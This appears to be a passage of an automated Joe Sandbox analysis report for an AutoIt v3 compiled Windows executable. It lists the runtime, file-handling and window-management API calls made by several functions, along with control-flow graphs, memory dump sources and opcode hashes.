                                                                                                                                                                                                                                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00EF5F47
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00EF5F6A
                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00EF5F73
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00EF5F7C
                                                                                                                                                                                                                                                      • __set_osfhnd.LIBCMT ref: 00EF5FAC
                                                                                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 00EF6016
                                                                                                                                                                                                                                                      • __close_nolock.LIBCMT ref: 00EF603C
                                                                                                                                                                                                                                                      • __chsize_nolock.LIBCMT ref: 00EF606C
                                                                                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 00EF607E
                                                                                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 00EF6176
                                                                                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 00EF618B
                                                                                                                                                                                                                                                      • __close_nolock.LIBCMT ref: 00EF61EB
                                                                                                                                                                                                                                                        • Part of subcall function 00EEEA9C: CloseHandle.KERNELBASE(00000000,00F6EEF4,00000000,?,00EF6041,00F6EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00EEEAEC
                                                                                                                                                                                                                                                        • Part of subcall function 00EEEA9C: GetLastError.KERNEL32(?,00EF6041,00F6EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00EEEAF6
                                                                                                                                                                                                                                                        • Part of subcall function 00EEEA9C: __free_osfhnd.LIBCMT ref: 00EEEB03
                                                                                                                                                                                                                                                        • Part of subcall function 00EEEA9C: __dosmaperr.LIBCMT ref: 00EEEB25
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
                                                                                                                                                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 00EF620D
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00EF6342
                                                                                                                                                                                                                                                      • ___createFile.LIBCMT ref: 00EF6361
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00EF636E
                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00EF6375
                                                                                                                                                                                                                                                      • __free_osfhnd.LIBCMT ref: 00EF6395
                                                                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 00EF63C3
                                                                                                                                                                                                                                                      • __wsopen_helper.LIBCMT ref: 00EF63DD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                      • API String ID: 3896587723-2766056989
                                                                                                                                                                                                                                                      • Opcode ID: 4fbff0f0732d98f5377d3aef14083695fa195fd7126d7411b4da3acc72daf93e
                                                                                                                                                                                                                                                      • Instruction ID: 60a7c7a23d6f196f7bb325f678d0d2bd45652447cc03f08dfd174abacd868421
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fbff0f0732d98f5377d3aef14083695fa195fd7126d7411b4da3acc72daf93e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A223872A0050E9BEF299F68DC45BFE7B61EB21318F246229E711B72E1C7358D40D751
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __getptd_noexit
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3074181302-0
                                                                                                                                                                                                                                                      • Opcode ID: a7acace79b6f385ff8b3f3f96c58d36b379123a6a9801c54ea413c6b73117e7b
                                                                                                                                                                                                                                                      • Instruction ID: 3dc82ac6e15c285aebd5615bd43d6bf99fdad57b77205785a1b3dd6335c9909c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7acace79b6f385ff8b3f3f96c58d36b379123a6a9801c54ea413c6b73117e7b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B321470A042CDDFDB218F69D840BBD7BB1AF56318F2460AAE895BB392D7309C45C761

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F0FA96
                                                                                                                                                                                                                                                      • _wcschr.LIBCMT ref: 00F0FAA4
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F0FABB
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0FACA
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0FAE8
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F0FB09
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F0FBE6
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F0FC0B
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F0FC1D
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F0FC32
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0FC47
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0FC59
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0FC6E
                                                                                                                                                                                                                                                        • Part of subcall function 00F0BFA4: _wcscmp.LIBCMT ref: 00F0C03E
                                                                                                                                                                                                                                                        • Part of subcall function 00F0BFA4: __wsplitpath.LIBCMT ref: 00F0C083
                                                                                                                                                                                                                                                        • Part of subcall function 00F0BFA4: _wcscpy.LIBCMT ref: 00F0C096
                                                                                                                                                                                                                                                        • Part of subcall function 00F0BFA4: _wcscat.LIBCMT ref: 00F0C0A9
                                                                                                                                                                                                                                                        • Part of subcall function 00F0BFA4: __wsplitpath.LIBCMT ref: 00F0C0CE
                                                                                                                                                                                                                                                        • Part of subcall function 00F0BFA4: _wcscat.LIBCMT ref: 00F0C0E4
                                                                                                                                                                                                                                                        • Part of subcall function 00F0BFA4: _wcscat.LIBCMT ref: 00F0C0F7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                                                                                                                      • API String ID: 2955681530-2806939583
                                                                                                                                                                                                                                                      • Opcode ID: 716f909a8bf83146a96e771921b87224a70330e9cec88546aa8dc17e60972be7
                                                                                                                                                                                                                                                      • Instruction ID: 4b2f47294ddf189edc87c88419825b73136bc9ddf7e1b250e46d059b62ce0d4e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 716f909a8bf83146a96e771921b87224a70330e9cec88546aa8dc17e60972be7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D691C172504345AFDB20EB54C951F9EB3E8FF84310F04886DF949A7292DB35EA48DB92

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00EC3F86
                                                                                                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00EC3FB0
                                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC3FC1
                                                                                                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00EC3FDE
                                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EC3FEE
                                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 00EC4004
                                                                                                                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EC4013
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                      • Opcode ID: 9b11460e1a49b7692f895497081391dcb3d0aec4374c3d06fe3c65d079386bb1
                                                                                                                                                                                                                                                      • Instruction ID: 3be82b36288c53685c9f99b7aae6fc2d517030f94ca75a4b638dc98fe5a3edb2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b11460e1a49b7692f895497081391dcb3d0aec4374c3d06fe3c65d079386bb1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4221E5B590121CAFDB40DFA4EC89BDDBBB8FB19700F00421AFA11A62A0E7B54545AF91

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1006 f0bfa4-f0c054 call eef8a0 call edf4ea call ec47b7 call f0bdb4 call ec4517 call ee15e3 1019 f0c107-f0c10e call f0c56d 1006->1019 1020 f0c05a-f0c061 call f0c56d 1006->1020 1025 f0c110-f0c112 1019->1025 1026 f0c117 1019->1026 1020->1025 1027 f0c067-f0c105 call ee1dfc call ee0d23 call ee0cf4 call ee1dfc call ee0cf4 * 2 1020->1027 1028 f0c367-f0c368 1025->1028 1030 f0c11a-f0c1d6 call ec44ed * 8 call f0c71a call ee3499 1026->1030 1027->1030 1031 f0c385-f0c393 call ec47e2 1028->1031 1065 f0c1d8-f0c1da 1030->1065 1066 f0c1df-f0c1fa call f0bdf8 1030->1066 1065->1028 1069 f0c200-f0c208 1066->1069 1070 f0c28c-f0c298 call ee35e4 1066->1070 1071 f0c210 1069->1071 1072 f0c20a-f0c20e 1069->1072 1077 f0c29a-f0c2a9 DeleteFileW 1070->1077 1078 f0c2ae-f0c2b2 1070->1078 1074 f0c215-f0c233 call ec44ed 1071->1074 1072->1074 1082 f0c235-f0c23b 1074->1082 1083 f0c25d-f0c273 call f0b791 call ee2aae 1074->1083 1077->1028 1080 f0c342-f0c356 CopyFileW 1078->1080 1081 f0c2b8-f0c32f call f0c81d call f0c845 call f0b965 1078->1081 1085 f0c358-f0c365 DeleteFileW 1080->1085 1086 f0c36a-f0c380 DeleteFileW call f0c6d9 1080->1086 1081->1086 1102 f0c331-f0c340 DeleteFileW 1081->1102 1088 f0c23d-f0c250 call f0bf2e 1082->1088 1099 f0c278-f0c283 1083->1099 1085->1028 1086->1031 1097 f0c252-f0c25b 1088->1097 1097->1083 1099->1069 1101 f0c289 1099->1101 1101->1070 1102->1028
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F0BDB4: __time64.LIBCMT ref: 00F0BDBE
                                                                                                                                                                                                                                                        • Part of subcall function 00EC4517: _fseek.LIBCMT ref: 00EC452F
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F0C083
                                                                                                                                                                                                                                                        • Part of subcall function 00EE1DFC: __wsplitpath_helper.LIBCMT ref: 00EE1E3C
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F0C096
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0C0A9
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F0C0CE
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0C0E4
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F0C0F7
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00F0C03E
                                                                                                                                                                                                                                                        • Part of subcall function 00F0C56D: _wcscmp.LIBCMT ref: 00F0C65D
                                                                                                                                                                                                                                                        • Part of subcall function 00F0C56D: _wcscmp.LIBCMT ref: 00F0C670
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F0C2A1
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F0C338
                                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F0C34E
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F0C35F
                                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F0C371
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2378138488-0
                                                                                                                                                                                                                                                      • Opcode ID: 4c93893382cd34d45ddf6171bc2a9221cdbcc11b377e97819a2a68746146ea6a
                                                                                                                                                                                                                                                      • Instruction ID: 6267dca77942f8a05f10697198c873a3584ab7b42bc6f2adc10d92a765a8ed5b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c93893382cd34d45ddf6171bc2a9221cdbcc11b377e97819a2a68746146ea6a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52C13CB1D00219ABDF11DF95CC81EDEB7BCAF49310F1041AAF609E6191DB709A84AF61

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1170 ec3742-ec3762 1172 ec3764-ec3767 1170->1172 1173 ec37c2-ec37c4 1170->1173 1174 ec37c8 1172->1174 1175 ec3769-ec3770 1172->1175 1173->1172 1176 ec37c6 1173->1176 1177 ec37ce-ec37d1 1174->1177 1178 f31e00-f31e2e call ec2ff6 call ede312 1174->1178 1179 ec382c-ec3834 PostQuitMessage 1175->1179 1180 ec3776-ec377b 1175->1180 1181 ec37ab-ec37b3 DefWindowProcW 1176->1181 1182 ec37f6-ec381d SetTimer RegisterWindowMessageW 1177->1182 1183 ec37d3-ec37d4 1177->1183 1217 f31e33-f31e3a 1178->1217 1187 ec37f2-ec37f4 1179->1187 1185 f31e88-f31e9c call f04ddd 1180->1185 1186 ec3781-ec3783 1180->1186 1188 ec37b9-ec37bf 1181->1188 1182->1187 1192 ec381f-ec382a CreatePopupMenu 1182->1192 1189 f31da3-f31da6 1183->1189 1190 ec37da-ec37ed KillTimer call ec3847 call ec390f 1183->1190 1185->1187 1209 f31ea2 1185->1209 1193 ec3789-ec378e 1186->1193 1194 ec3836-ec3845 call edeb83 1186->1194 1187->1188 1202 f31da8-f31daa 1189->1202 1203 f31ddc-f31dfb MoveWindow 1189->1203 1190->1187 1192->1187 1198 ec3794-ec3799 1193->1198 1199 f31e6d-f31e74 1193->1199 1194->1187 1207 ec379f-ec37a5 1198->1207 1208 f31e58-f31e68 call f055bd 1198->1208 1199->1181 1205 f31e7a-f31e83 call efa5f3 1199->1205 1211 f31dcb-f31dd7 SetFocus 1202->1211 1212 f31dac-f31daf 1202->1212 1203->1187 1205->1181 1207->1181 1207->1217 1208->1187 1209->1181 1211->1187 1212->1207 1213 f31db5-f31dc6 call ec2ff6 1212->1213 1213->1187 1217->1181 1221 f31e40-f31e53 call ec3847 call ec4ffc 1217->1221 1221->1181
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00EC37B3
                                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000001), ref: 00EC37DD
                                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EC3800
                                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC380B
                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00EC381F
                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00EC382E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                      • String ID: TaskbarCreated
                                                                                                                                                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                      • Opcode ID: b77553d84b69a4b96309e4d153b544512de574e0272bb5a42296837256cf30f1
                                                                                                                                                                                                                                                      • Instruction ID: c83e3963b667603d9a496d4f344f8c477dddcc4f3bdae6b711408277bb453340
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b77553d84b69a4b96309e4d153b544512de574e0272bb5a42296837256cf30f1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D4148F920014DA7DB146B389E4AFFB3699FB04310F00A21EF902F6191CB629D53B761

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00EC3E79
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00EC3E88
                                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00EC3E9E
                                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00EC3EB0
                                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00EC3EC2
                                                                                                                                                                                                                                                        • Part of subcall function 00EC4024: LoadImageW.USER32(00EC0000,00000063,00000001,00000010,00000010,00000000), ref: 00EC4048
                                                                                                                                                                                                                                                      • RegisterClassExW.USER32(?), ref: 00EC3F30
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: GetSysColorBrush.USER32(0000000F), ref: 00EC3F86
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: RegisterClassExW.USER32(00000030), ref: 00EC3FB0
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC3FC1
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: InitCommonControlsEx.COMCTL32(?), ref: 00EC3FDE
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EC3FEE
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: LoadIconW.USER32(000000A9), ref: 00EC4004
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EC4013
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                      • Opcode ID: 9db8bc44b2b430c37cfd02a312b7a15f26292a8de2e59c710e824538cc03efa0
                                                                                                                                                                                                                                                      • Instruction ID: 99544e85382f1c1853b5ca5b97cf306f8f0ace2a000af5561e84d430521fbb00
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9db8bc44b2b430c37cfd02a312b7a15f26292a8de2e59c710e824538cc03efa0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 432151B4D00308ABDB10DFA9EC49AE9BFF9FB48710F00521AE605A22A0D3754641AF91

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
